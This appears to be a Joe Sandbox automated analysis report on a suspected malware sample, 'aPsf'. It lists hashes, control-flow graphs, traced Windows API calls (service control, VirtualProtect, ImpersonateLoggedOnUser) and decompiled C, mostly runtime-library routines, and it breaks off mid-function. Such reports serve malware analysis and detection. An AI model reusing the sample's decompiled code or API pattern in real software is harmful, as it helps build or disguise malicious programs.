                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 191 25299e8-2529a49 193 2529a82-2529ad2 OpenServiceA 191->193 194 2529a4b-2529a55 191->194 201 2529ad4-2529ada 193->201 202 2529adb-2529b0c 193->202 194->193 195 2529a57-2529a59 194->195 197 2529a5b-2529a65 195->197 198 2529a7c-2529a7f 195->198 199 2529a67 197->199 200 2529a69-2529a78 197->200 198->193 199->200 200->200 203 2529a7a 200->203 201->202 206 2529b0e-2529b12 202->206 207 2529b1c 202->207 203->198 206->207 208 2529b14 206->208 208->207
                                                                        APIs
                                                                        • OpenServiceA.ADVAPI32(?,?,?), ref: 02529AC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 45cca6a36ef9b97f301771ee34271135dfe44208d93eb123eb90b8dcd8f091b1
                                                                        • Instruction ID: 37ba06966945ec5e3685f56b97be62777c9c9745de30580449de677e8675eb89
                                                                        • Opcode Fuzzy Hash: 45cca6a36ef9b97f301771ee34271135dfe44208d93eb123eb90b8dcd8f091b1
                                                                        • Instruction Fuzzy Hash: 433143B1D002688FDB10CFA9C885BDEBBF5BB49304F248529E819AB380D7749849CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 209 2529920-252996f 211 2529971-2529974 209->211 212 2529977-252997b 209->212 211->212 213 2529983-25299b2 OpenSCManagerW 212->213 214 252997d-2529980 212->214 215 25299b4-25299ba 213->215 216 25299bb-25299cf 213->216 214->213 215->216
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 025299A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 1889721586-0
                                                                        • Opcode ID: 5f6705c7a8f91029b5458aa03f54e3f2e631e78ea98113007d43d0449632b31e
                                                                        • Instruction ID: 3670b54679fe86fe8b7bab13c4677faad45416d09aa4fa53f5d841fe6e94732b
                                                                        • Opcode Fuzzy Hash: 5f6705c7a8f91029b5458aa03f54e3f2e631e78ea98113007d43d0449632b31e
                                                                        • Instruction Fuzzy Hash: 5B2104B5D002199FCB10CF9AD984ADEFBF4FB89324F14815AD808BB384D7759944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 218 2529180-2529201 VirtualProtect 221 2529203-2529209 218->221 222 252920a-252922f 218->222 221->222
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 025291F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 7952df642a019b444138781fad298f5d42bf5244a41a65e788cc324fffcda221
                                                                        • Instruction ID: 6847af994db5253456302bb6286e35550648d3560bb6d68bc93a0fd76e516bfe
                                                                        • Opcode Fuzzy Hash: 7952df642a019b444138781fad298f5d42bf5244a41a65e788cc324fffcda221
                                                                        • Instruction Fuzzy Hash: DC11F4B1D002599BDB10DFAAC984AEFFBF4FF58314F50842AD419A7240C7799944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 226 2529350-25293bf FindCloseChangeNotification 229 25293c1-25293c7 226->229 230 25293c8-25293ed 226->230 229->230
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE ref: 025293B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 6b3a16f1819b3e7c48d4d2ad3c7bbc3eda44bfaa68e7ced03d48010eff21e268
                                                                        • Instruction ID: 17c042ba7160379a5e6fa6329ab78b264e23fdead818b3d7bd86f6c9624d4395
                                                                        • Opcode Fuzzy Hash: 6b3a16f1819b3e7c48d4d2ad3c7bbc3eda44bfaa68e7ced03d48010eff21e268
                                                                        • Instruction Fuzzy Hash: 1A1128B1D002598BDB10DFAAC5447EEBBF4EF98314F208419D519A7380C779A944CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 239 2529ed8-2529f44 ImpersonateLoggedOnUser 241 2529f46-2529f4c 239->241 242 2529f4d-2529f6e 239->242 241->242
                                                                        APIs
                                                                        • ImpersonateLoggedOnUser.KERNELBASE ref: 02529F37
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 73574372a016623ac6b8050e3855ed32a7bf44495712f00a4da7b637b9dca009
                                                                        • Instruction ID: 82e900a92f4c4ff2de3d950214afd42e8e90bb058fb034bb5426bb00b429ac39
                                                                        • Opcode Fuzzy Hash: 73574372a016623ac6b8050e3855ed32a7bf44495712f00a4da7b637b9dca009
                                                                        • Instruction Fuzzy Hash: 4C1106B1900259CFDB10CF9AD944BDEBBF8EB58324F20845AD558A3780D378A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 234 2529cc8-2529d34 FindCloseChangeNotification 236 2529d36-2529d3c 234->236 237 2529d3d-2529d5e 234->237 236->237
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE ref: 02529D27
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 26446bd910e21c220aef39721e0258155c77a42f01f74c24984f9fabfe6c9c6c
                                                                        • Instruction ID: 0854e1ebedb4f47d1d6b178644bc87b9d3c66826598c72c3df0f1b736f09f512
                                                                        • Opcode Fuzzy Hash: 26446bd910e21c220aef39721e0258155c77a42f01f74c24984f9fabfe6c9c6c
                                                                        • Instruction Fuzzy Hash: 201106B59002598FDB10CF9AD944BDEFBF8EB58324F20845AD558A3780D378A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 323 40d534-40d556 HeapCreate 324 40d558-40d559 323->324 325 40d55a-40d563 323->325
                                                                        C-Code - Quality: 100%
                                                                        			E0040D534(intOrPtr _a4) {
                                                                        				void* _t6;
                                                                        
                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                        				 *0x4234b4 = _t6;
                                                                        				if(_t6 != 0) {
                                                                        					 *0x4250b0 = 1;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t6;
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0
                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 326 40ea0a-40ea16 call 40e8de 328 40ea1b-40ea1f 326->328
                                                                        C-Code - Quality: 25%
                                                                        			E0040EA0A(intOrPtr _a4) {
                                                                        				void* __ebp;
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t4;
                                                                        				void* _t5;
                                                                        				void* _t8;
                                                                        
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_a4);
                                                                        				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                        				return _t2;
                                                                        			}










                                                                        APIs
                                                                        • _doexit.LIBCMT ref: 0040EA16
                                                                          • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                        • String ID:
                                                                        • API String ID: 1597249276-0
                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292658701.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_84d000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e104a1e4195cbc603625ce7445cff17741342c25fbea1322d8f3225652de673
                                                                        • Instruction ID: 5d3bd7544ca20318de6637aec213db6ea65be3fd9cd093fc760d4a82dbf66fce
                                                                        • Opcode Fuzzy Hash: 9e104a1e4195cbc603625ce7445cff17741342c25fbea1322d8f3225652de673
                                                                        • Instruction Fuzzy Hash: CC01F771404788AAE7108A16CC80B62BFD8FF51364F18C11AED059B242C2789C45C6B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292658701.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_84d000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eb92c8b4d5da2874c60461c078e870559386acf239d57516a7994de8bad3119
                                                                        • Instruction ID: 166feee001bf90d5139cc09c3fb089bfe0193d5d576b1d0e05a06f111e736fd6
                                                                        • Opcode Fuzzy Hash: 7eb92c8b4d5da2874c60461c078e870559386acf239d57516a7994de8bad3119
                                                                        • Instruction Fuzzy Hash: 7AF0C271404388AEE7108A16CC84B62FFDCEB51324F18C15AED585F686C3799C44CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                        				intOrPtr _v0;
                                                                        				void* _v804;
                                                                        				intOrPtr _v808;
                                                                        				intOrPtr _v812;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t13;
                                                                        				long _t17;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t6 = __eax;
                                                                        				_t34 = _t22 -  *0x422234; // 0x5a9fcee
                                                                        				if(_t34 == 0) {
                                                                        					asm("repe ret");
                                                                        				}
                                                                        				 *0x423b98 = _t6;
                                                                        				 *0x423b94 = _t22;
                                                                        				 *0x423b90 = _t25;
                                                                        				 *0x423b8c = _t21;
                                                                        				 *0x423b88 = _t27;
                                                                        				 *0x423b84 = _t26;
                                                                        				 *0x423bb0 = ss;
                                                                        				 *0x423ba4 = cs;
                                                                        				 *0x423b80 = ds;
                                                                        				 *0x423b7c = es;
                                                                        				 *0x423b78 = fs;
                                                                        				 *0x423b74 = gs;
                                                                        				asm("pushfd");
                                                                        				_pop( *0x423ba8);
                                                                        				 *0x423b9c =  *_t31;
                                                                        				 *0x423ba0 = _v0;
                                                                        				 *0x423bac =  &_a4;
                                                                        				 *0x423ae8 = 0x10001;
                                                                        				_t11 =  *0x423ba0; // 0x0
                                                                        				 *0x423a9c = _t11;
                                                                        				 *0x423a90 = 0xc0000409;
                                                                        				 *0x423a94 = 1;
                                                                        				_t12 =  *0x422234; // 0x5a9fcee
                                                                        				_v812 = _t12;
                                                                        				_t13 =  *0x422238; // 0xfa560311
                                                                        				_v808 = _t13;
                                                                        				 *0x423ae0 = IsDebuggerPresent();
                                                                        				_push(1);
                                                                        				E004138FC(_t14);
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                        				if( *0x423ae0 == 0) {
                                                                        					_push(1);
                                                                        					E004138FC(_t17);
                                                                        				}
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}




















                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID:
                                                                        • API String ID: 2579439406-0
                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ADB0(intOrPtr* __ecx) {
                                                                        				void* _t5;
                                                                        				intOrPtr* _t11;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				_t5 =  *(__ecx + 8);
                                                                        				 *__ecx = 0x41eff0;
                                                                        				if(_t5 != 0) {
                                                                        					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                        				}
                                                                        				if( *(_t11 + 0xc) != 0) {
                                                                        					_t5 = GetProcessHeap();
                                                                        					if(_t5 != 0) {
                                                                        						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                        					}
                                                                        				}
                                                                        				return _t5;
                                                                        			}






                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3859560861-0
                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				void* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t110;
                                                                        				intOrPtr _t112;
                                                                        				intOrPtr _t113;
                                                                        				short* _t115;
                                                                        				short* _t116;
                                                                        				char* _t120;
                                                                        				short* _t121;
                                                                        				short* _t123;
                                                                        				short* _t127;
                                                                        				int _t128;
                                                                        				short* _t141;
                                                                        				signed int _t144;
                                                                        				void* _t146;
                                                                        				short* _t147;
                                                                        				signed int _t150;
                                                                        				short* _t153;
                                                                        				char* _t157;
                                                                        				int _t160;
                                                                        				long _t162;
                                                                        				signed int _t174;
                                                                        				signed int _t178;
                                                                        				signed int _t179;
                                                                        				int _t182;
                                                                        				short* _t184;
                                                                        				signed int _t186;
                                                                        				signed int _t188;
                                                                        				short* _t189;
                                                                        				int _t191;
                                                                        				intOrPtr _t194;
                                                                        				int _t207;
                                                                        
                                                                        				_t110 =  *0x422234; // 0x5a9fcee
                                                                        				_v8 = _t110 ^ _t188;
                                                                        				_t184 = __ecx;
                                                                        				_t194 =  *0x423e7c; // 0x1
                                                                        				if(_t194 == 0) {
                                                                        					_t182 = 1;
                                                                        					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                        						_t162 = GetLastError();
                                                                        						__eflags = _t162 - 0x78;
                                                                        						if(_t162 == 0x78) {
                                                                        							 *0x423e7c = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x423e7c = 1;
                                                                        					}
                                                                        				}
                                                                        				if(_a16 <= 0) {
                                                                        					L13:
                                                                        					_t112 =  *0x423e7c; // 0x1
                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                        						_v16 = 0;
                                                                        						_v20 = 0;
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                        						}
                                                                        						__eflags = _a28;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                        						_v24 = _t113;
                                                                        						__eflags = _t113 - 0xffffffff;
                                                                        						if(_t113 != 0xffffffff) {
                                                                        							__eflags = _t113 - _a28;
                                                                        							if(_t113 == _a28) {
                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                        								L78:
                                                                        								__eflags = _v16;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_v16);
                                                                        									E0040B6B5(0, _t182, _t184, __eflags);
                                                                        								}
                                                                        								_t115 = _v20;
                                                                        								__eflags = _t115;
                                                                        								if(_t115 != 0) {
                                                                        									__eflags = _a20 - _t115;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t115);
                                                                        										E0040B6B5(0, _t182, _t184, __eflags);
                                                                        									}
                                                                        								}
                                                                        								_t116 = _t184;
                                                                        								goto L84;
                                                                        							}
                                                                        							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                        							_t191 =  &(_t189[0xc]);
                                                                        							_v16 = _t120;
                                                                        							__eflags = _t120;
                                                                        							if(_t120 == 0) {
                                                                        								goto L58;
                                                                        							}
                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                        							_v12 = _t121;
                                                                        							__eflags = _t121;
                                                                        							if(__eflags != 0) {
                                                                        								if(__eflags <= 0) {
                                                                        									L71:
                                                                        									_t182 = 0;
                                                                        									__eflags = 0;
                                                                        									L72:
                                                                        									__eflags = _t182;
                                                                        									if(_t182 == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									E0040BA30(_t182, _t182, 0, _v12);
                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                        									_v12 = _t123;
                                                                        									__eflags = _t123;
                                                                        									if(_t123 != 0) {
                                                                        										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                        										_v20 = _t186;
                                                                        										asm("sbb esi, esi");
                                                                        										_t184 =  ~_t186 & _v12;
                                                                        										__eflags = _t184;
                                                                        									} else {
                                                                        										_t184 = 0;
                                                                        									}
                                                                        									E004147AE(_t182);
                                                                        									goto L78;
                                                                        								}
                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                        								if(_t121 > 0xffffffe0) {
                                                                        									goto L71;
                                                                        								}
                                                                        								_t127 =  &(_t121[4]);
                                                                        								__eflags = _t127 - 0x400;
                                                                        								if(_t127 > 0x400) {
                                                                        									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                        									__eflags = _t128;
                                                                        									if(_t128 != 0) {
                                                                        										 *_t128 = 0xdddd;
                                                                        										_t128 = _t128 + 8;
                                                                        										__eflags = _t128;
                                                                        									}
                                                                        									_t182 = _t128;
                                                                        									goto L72;
                                                                        								}
                                                                        								E0040CFB0(_t127);
                                                                        								_t182 = _t191;
                                                                        								__eflags = _t182;
                                                                        								if(_t182 == 0) {
                                                                        									goto L62;
                                                                        								}
                                                                        								 *_t182 = 0xcccc;
                                                                        								_t182 = _t182 + 8;
                                                                        								goto L72;
                                                                        							}
                                                                        							L62:
                                                                        							_t184 = 0;
                                                                        							goto L78;
                                                                        						} else {
                                                                        							goto L58;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t112 != 1) {
                                                                        							L58:
                                                                        							_t116 = 0;
                                                                        							L84:
                                                                        							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                        						}
                                                                        						_v12 = 0;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t184 = MultiByteToWideChar;
                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                        						_t207 = _t182;
                                                                        						if(_t207 == 0) {
                                                                        							goto L58;
                                                                        						} else {
                                                                        							if(_t207 <= 0) {
                                                                        								L28:
                                                                        								_v16 = 0;
                                                                        								L29:
                                                                        								if(_v16 == 0) {
                                                                        									goto L58;
                                                                        								}
                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                        									L52:
                                                                        									E004147AE(_v16);
                                                                        									_t116 = _v12;
                                                                        									goto L84;
                                                                        								}
                                                                        								_t184 = LCMapStringW;
                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                        								_v12 = _t174;
                                                                        								if(_t174 == 0) {
                                                                        									goto L52;
                                                                        								}
                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                        									__eflags = _t174;
                                                                        									if(_t174 <= 0) {
                                                                        										L44:
                                                                        										_t184 = 0;
                                                                        										__eflags = 0;
                                                                        										L45:
                                                                        										__eflags = _t184;
                                                                        										if(_t184 != 0) {
                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                        											__eflags = _t141;
                                                                        											if(_t141 != 0) {
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        												__eflags = _a24;
                                                                        												if(_a24 != 0) {
                                                                        													_push(_a24);
                                                                        													_push(_a20);
                                                                        												} else {
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        												}
                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                        											}
                                                                        											E004147AE(_t184);
                                                                        										}
                                                                        										goto L52;
                                                                        									}
                                                                        									_t144 = 0xffffffe0;
                                                                        									_t179 = _t144 % _t174;
                                                                        									__eflags = _t144 / _t174 - 2;
                                                                        									if(_t144 / _t174 < 2) {
                                                                        										goto L44;
                                                                        									}
                                                                        									_t52 = _t174 + 8; // 0x8
                                                                        									_t146 = _t174 + _t52;
                                                                        									__eflags = _t146 - 0x400;
                                                                        									if(_t146 > 0x400) {
                                                                        										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                        										__eflags = _t147;
                                                                        										if(_t147 != 0) {
                                                                        											 *_t147 = 0xdddd;
                                                                        											_t147 =  &(_t147[4]);
                                                                        											__eflags = _t147;
                                                                        										}
                                                                        										_t184 = _t147;
                                                                        										goto L45;
                                                                        									}
                                                                        									E0040CFB0(_t146);
                                                                        									_t184 = _t189;
                                                                        									__eflags = _t184;
                                                                        									if(_t184 == 0) {
                                                                        										goto L52;
                                                                        									}
                                                                        									 *_t184 = 0xcccc;
                                                                        									_t184 =  &(_t184[4]);
                                                                        									goto L45;
                                                                        								}
                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                        								}
                                                                        								goto L52;
                                                                        							}
                                                                        							_t150 = 0xffffffe0;
                                                                        							_t179 = _t150 % _t182;
                                                                        							if(_t150 / _t182 < 2) {
